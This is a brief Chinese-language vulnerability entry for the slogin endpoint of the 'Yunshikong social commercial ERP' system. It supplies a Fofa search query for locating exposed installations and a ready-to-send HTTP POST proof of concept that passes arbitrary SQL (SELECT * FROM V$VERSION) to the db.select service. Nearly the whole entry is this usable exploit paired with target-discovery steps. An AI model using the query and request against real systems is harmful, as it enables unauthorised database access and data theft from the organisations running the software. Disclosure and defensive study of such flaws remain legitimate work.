漏洞描述:
云时空社会化商业ERP系统slogin存在SQL注入漏洞,攻击者可以通过此漏洞获取数据库敏感信息。
搜索语法:
Fofa-Query: app="云时空社会化商业ERP系统"
漏洞详情:
1.云时空社会化商业ERP系统。
2.漏洞POC:
POST /slogin/service?service=db.select HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
params=%7B%22sql%22%3A%22SELECT+%2A+FROM+V%24VERSION%22%7D
3.漏洞复现结果。